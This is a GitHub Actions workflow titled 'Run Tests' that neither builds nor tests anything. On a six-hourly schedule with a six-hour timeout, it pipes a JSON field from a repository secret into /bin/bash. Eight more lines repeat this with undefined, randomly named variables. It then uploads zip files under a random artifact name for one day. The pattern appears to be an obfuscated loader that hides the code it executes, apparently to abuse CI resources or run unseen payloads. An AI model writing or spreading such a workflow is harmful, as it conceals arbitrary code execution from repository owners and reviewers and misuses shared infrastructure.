name: Run Tests
on:
  workflow_dispatch:

  schedule:
    - cron: '36 0,6,12,18 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  perform:
    name: Run build
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Run build
        env:
          wz930: ${{ secrets.wz930 }}
        run: |
          printf '%s' "$wz930" | jq -r .jyil5 | /bin/bash
          printf '%s' "$qfzs80881" | jq -r .qlplq13809 | /bin/bash
          printf '%s' "$dadpb7" | jq -r .f9 | /bin/bash
          echo $g42 | jq -r .wwui012 | /bin/bash
          echo $qhs90 | jq -r .j81 | /bin/bash
          printf '%s' "$xize575" | jq -r .fmt6822 | /bin/bash
          echo $cf455 | jq -r .feo2 | /bin/bash
          echo $d4 | jq -r .vz59 | /bin/bash
          printf '%s' "$ycnn7105" | jq -r .xn496 | /bin/bash

      - name: Save archive
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: yf8RKpOU
          path: "*.zip"
          retention-days: 1
